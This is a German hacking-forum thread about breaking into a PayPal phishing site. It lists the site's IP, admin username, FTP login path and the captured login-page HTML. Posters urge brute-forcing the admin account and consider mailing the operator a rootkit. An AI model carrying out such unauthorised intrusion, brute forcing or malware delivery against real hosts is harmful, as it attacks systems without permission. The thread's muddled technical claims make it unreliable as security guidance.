How to fish a Phish

Bruce · 18. Oktober 2012

So ich habe es mal runter reduziert. Fällt ansonten schwer das zu verfolgen.

Der SERVER ist down. Wahrscheinlich überlastet, weil einer der MEga Haxxor hier ne Brutforce 3000 Threads Attacke gefahren hat. "Sorry too much for kleine Ausland Server"

url: paypal-services.de
ip: http://218.111.106.155:80
Web-Engine: Apache 2.2
Content Management System: Coeus

User: admin
Login : Coeus Content Management Systems Control Panel
Login2: ftp://admin@218.111.106.155:21
Email for phishing: W**2L**@yahoo.com (ausgesternt reicht wenn ich die weiß)

Lücken:
a) PHP Brute Force
b) FTP Bruteforce
c) Social Engineering
d) Email für RootKit
e) Passwort generierung möglich (Länge unbekannt) für PHP Brute Force

Nicht verfolstädnigte Maßnahmen:
a) Manual für Content Management nicht gefunden
b) Ordner BruteForce (10 Threads) - leider nicht vollstädig, da Server Shutdown

Einlogscript:

http://218.111.106.155/js.php?f=admin&a=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11">
<html>
<head>
<title>Coeus Content Management Systems Control Panel</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="robots" content="noindex, nofollow" />
<style type="text/css">
@import url("styles/styles.css");
@import url("styles/tabmenu.css");
</style>

<script language="javascript" src="../javascript/jquery.js"></script>
<script type="text/javascript" src="../javascript/thickbox.js"></script>
<script language="javascript" src="http://218.111.106.155/js.php?f=admin&a=1"></script>
<link rel="stylesheet" href="styles/thickbox.css" type="text/css" media="screen" />
</head>
<body> <form action="index.php" method="post" name="frmLogin" id="frmLogin">
<input type="hidden" name="submit_login" value="true">
<div id="box">
<table><tr><td style="border:solid 2px #DDD; padding:20px; background-color:#FFF; width:300px">
<table>
<tr>
<td class="Heading1">
<img src="images/iwp.jpg" />
</td>
</tr>
<tr>
<td><div style="padding:10px 0px 5px 0px;">Login with your username and password below.</div>
<table>
<tr>
<td nowrap style="padding:0px 10px 0px 10px">Username:</td>
<td nowrap>
<input type="text" name="username" id="username" class="Field150" value=""> </td>
</tr>
<tr>
<td nowrap style="padding:0px 10px 0px 10px">Password:</td>
<td nowrap>
<input type="password" name="password" id="password" class="Field150" value=""> </td>
</tr>
<tr>
<td nowrap> </td>
<td> <input type="checkbox" name="remember" id="remember" value="ON" style="margin-left:-0px"> <label for="remember" >Remember my login details</label>
</td>
</tr>
<tr>
<td> </td>
<td>
<input type="submit" name="SubmitButton" value="Login" class="FormButton">
  <a href='index.php?forgotpass=true'>Forgot your password?</a>
</td>
</tr>
<tr><td class="Gap"></td></tr>
</table>
</td>
</tr>
</table>
</td></tr></table>
<div style="padding:10px; margin-bottom:20px; padding-left:0px; text-align:center" class="PageFooter">
Powered by <a target="_blank" href="http://www.coeus.com.my">Coeus CCMS-Content Management Systems 5.0.10</a> © 2004-2012 Coeus </div>
</div>
</form>
<script type="text/javascript">
$('#frmLogin').submit(function() {
var f = document.frmLogin;
if(f.username.value == '')
{
alert('Please enter your username.');
f.username.focus();
f.username.select();
return false;
}
if(f.password.value == '')
{
alert('Please enter a password.');
f.password.focus();
f.password.select();
----
>>
'username: ' + document.frmLogin.username.value + "\n" +
'password: ' + document.frmLogin.password.value
>>
----
return false;
}
// Everything is OK
return true;
});
function sizeBox() {
var w = $(window).width();
var h = $(window).height();
$('#box').css('position', 'absolute');
$('#box').css('top', h/2-($('#box').height()/2)-50);
$('#box').css('left', w/2-($('#box').width()/2));
}
$(document).ready(function() {
sizeBox();
$('#username').focus();
});
$(window).resize(function() {
sizeBox();
});
</script>
</body>
</html>

Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Anzeige

Diversity · 18. Oktober 2012

AW: How to fish a Phish

Ne Phishing Seite mit .de und Realdaten??

DerEntscheider · 18. Oktober 2012

AW: How to fish a Phish

Natürlich Realdaten *facepalm*

Diversity · 18. Oktober 2012

AW: How to fish a Phish

Ich war geistig noch nicht ganz bei mir

Bruce · 18. Oktober 2012

AW: How to fish a Phish

Da muss ich mal antworten anstatt zu "Editen".

Natürlich ist der Arme Mann der gerne nach Gambia fährt hier auch nur ein Opfer - Das wäre 2012 viel zu einfach mit den Realdaten. Aber vor 10 Jahren gab es auch noch solche DAUs.

Diversity · 18. Oktober 2012

AW: How to fish a Phish

DAUs gibts auch heute noch zahlreiche. Wundere mich immer wieder...
Schließlich gäb es solche Mails nicht, wenn niemand drauf eingehen würde.

Decryptor · 18. Oktober 2012

AW: How to fish a Phish

denk ich auch mal, bekomm öfters Paypal Fishmails, und teilweise sind da welche die auf eigentlich ordentliche Boards verweisen in nem Subdir

Alex² · 19. Oktober 2012

AW: How to fish a Phish

Außer ein paar Whois Daten und leeren Phrasen über irgendwelche Scripte hast du hier noch nichts zu Stande gebracht.

Der Thread ist so lange uninteressant, wie du keine Shell (oder vergleichbares) auf dem Server hast (was ich dir im übrigen nicht zutraue).

Wäre ich nicht gerade zu müde, würde ich vielleicht einsteigen und dir zeigen wie man so was macht. Ansonsten ist es interessant wie schnell sich die Leute hier beeindrucken lassen

Ansonsten begrüße ich derartige Threads dennoch. Der hier war auch recht interessant:

Explorer.EXE connected 91.217.249.16 - RR:Board

//

Das ist auch kein Zufall, sondern liegt daran, dass der ganze Server wahrscheinlich von seinem eigentlichen Administrator, welcher auch dieses CMS aufgesetzt hat vernachlässigt bzw. momentan nicht beachtet wird. Das wiederum führte dazu, dass sich jemand fremdes Kontrolle verschafft hat.

Es ist also nicht verwunderlich, dass auf einem Malaysischem Server ein malaysisches CMS liegt.

Ist also vollkommen normal, du ziehst wahrscheinlich die falschen Schlüsse. Der FTP ist wahrscheinlich auch von den Malaysischem Admin und deine "Informationen" (welche ich ohnehin anzweifele) somit Wertlos.

Ansonsten solltest du vorsichtiger sein, du gehst zu voreingenommen an die ganze Sache ran. Du kannst die Zugehörigkeit von Informationen (z.B. Ebay, Foren und Mailaccounts) nicht einfach so bestimmen.

Der erste Schritt ist davon auszugehen, dass die Gegenseite intelligenter als man selbst ist und jede Erkenntnis als falsch einzustufen und nach Wahrscheinlichkeit zu bewerten. Das machst du so lange bis du nicht mehr in der Lage bist neue Daten zu sammeln und schaust dir dann wieder das Gesamtbild bzw. die Relation der Daten an und bewertest ggf. neu.

romestylez · 20. Oktober 2012

AW: How to fish a Phish

+1 für Alex²

http://paypal-services.de/admin/index.php

Brute halt das PW für den User "admin" diesen gibt es zu 100% (Kannst ja mal "Lost Password" machen wenn man einen falschen Namen eingibt wird es einem auch angezeigt.)

Wie gesagt eigentlich hast du noch nichts geleistet die whois-Daten etc. hätte sogar unser überhaxx0r alexgold zusammenbekommen.

Bruce · 20. Oktober 2012

AW: How to fish a Phish

Ihr beiden bis auf geflame auch nicht.

Der Login username ist mir schon seit zwei Tagen bekannt. Ich habe sogar die passende Email dazu und Root Shell Access ohne SSH Port (?!)- Da benötigt man ein Crossscript. Das wiederum geht nur wenn man aktiv Code einbinden kann in das System.
Um den Username rauszufinden braucht ich übrigens einen Versuch und keine Brute Attacke - Und ganz nebenbei gebe ich in meinen Kommentaren eigentlich keine Anleitungen wie man da am besten reinkommt. Ihr könnt mir aber gerne kosntruktive Ansätze via PN posten, anstatt euch hier zum Horst zu machen.

Alex² · 20. Oktober 2012

AW: How to fish a Phish

Du hast keine Ahnung wovon du da redest. Poste doch einfach mal Hacklogs, wie man es normalerweise macht, bevor man dumm herumredet. Führe einfach ein paar Befehle aus die z.B. Systeminformationen geben, so wie ich es hier gemacht habe:

Explorer.EXE connected 91.217.249.16 - RR:Board

Dann glauben die Leute dir auch, was du da von dir gibst. Ansonsten redest du immer noch jede Menge zusammenhangslosen Scheiß, der sich einfach nach irgendwelchen Begriffen anhört, welche du irgendwo aufgeschnappt hast.

Du sagst, dass du "Root-Shell-Access" hast aber "keinen Code einbinden kannst" :lol:

Was istn mit dir los. Du solltest wissen, dass ich es wahrscheinlich könnte.

//Scheint momentan offline zu sein.

Bruce · 20. Oktober 2012

AW: How to fish a Phish

So ich habe es mal runter reduziert. Fällt ansonten schwer das zu verfolgen.

Der SERVER ist down. Wahrscheinlich überlastet, weil einer der MEga Haxxor hier ne Brutforce 3000 Threads Attacke gefahren hat. "Sorry too much for kleine Ausland Server"

url: paypal-services.de
ip: http://218.111.106.155:80
Web-Engine: Apache 2.2
Content Management System: Coeus

User: admin
Login : Coeus Content Management Systems Control Panel
Login2: ftp://admin@218.111.106.155:21
Email for phishing: W**2L**@yahoo.com (ausgesternt reicht wenn ich die weiß)

Lücken:
a) PHP Brute Force
b) FTP Bruteforce
c) Social Engineering
d) Email für RootKit
e) Passwort generierung möglich (Länge unbekannt) für PHP Brute Force

Nicht verfolstädnigte Maßnahmen:
a) Manual für Content Management nicht gefunden
b) Ordner BruteForce (10 Threads) - leider nicht vollstädig, da Server Shutdown

Alex² · 20. Oktober 2012

AW: How to fish a Phish

Das war doch gar nicht so schwer. Jetzt haben wir auch eine einiger Maßen vernünftige Diskussionsgrundlage. Im Folgendem gehe ich einfach mal davon aus, dass die von dir gesammelten Daten zutreffen.

a) PHP Brute Force
Ich nehme einfach mal an, dass du damit Meinst irgendwelche POST oder GET Parameter im Zusammenhang mit einer Anmeldung zu Brute-Forcen. Ist wenig effizient, da Brute Force. Sollte man ganz hinten anhängen

b) PHP Brute Force
Ist wenig effizient, da Brute Force. Sollte man ganz hinten anhängen

c) Social Engineering
Würde mich sehr wundern, wenn der Admin überhaupt auf irgendetwas reagiert. Der kriegt so ja schon nichts mehr mit .

d) Email für RootKit
Das ist wieder mal eine Phrase, welche ich nicht verstehe. Du möchtest dem Typ per E-Mail ein Rootkit bzw. Maleware unterschieben? Lässt sich durch irgendwelche Drive-By Exploits sicher realisieren. Fällt allerdings zum großem Teil auch unter c) und wird wahrscheinlich vom Empfänger ignoriert

e) Passwort Generierung möglich
Halte ich (alleine betrachtet) nicht mal für eine Lücke. Höchstens für eine Design-Schwäche. Wobei ich mir bei der Beschreibung auch schon wieder verschiedene Mechanismen vorstellen kann.

Also, was wir bis jetzt haben:
a) und b) bzw. c) und d) sind generische Verwundbarkeiten die auf JEDES System zutreffen, welches entsprechende Dienste am laufen haben bzw. von Menschen verwaltet werden. -> Wertlos

e) Könnte sich im Zusammenhang mit anderen Funktionalitäten als hilfreich erweisen, ist aber wahrscheinlich nutzlos zumal nicht klar ist ob die generierten Passwörter tatsächlich direkt irgendwo gespeichert / aktiviert werden. -> praktisch Wertlos

Im Grunde liegt hier also NICHTS vor, was sich nicht innerhalb von 60 Sekunden über jedes vergleichbare System sagen lässt. Diese Informationen sind von der gleichen Qualität wie irgendwelche Whois Abfragen.

Ich weiß, dass euch das nicht gefällt, weil ihr gerne Hacker spielt. Aber irgendwo muss man das dann auch mal einsehen.

Nützliche Suchen

How to fish a Phish

Videos zum Themenbereich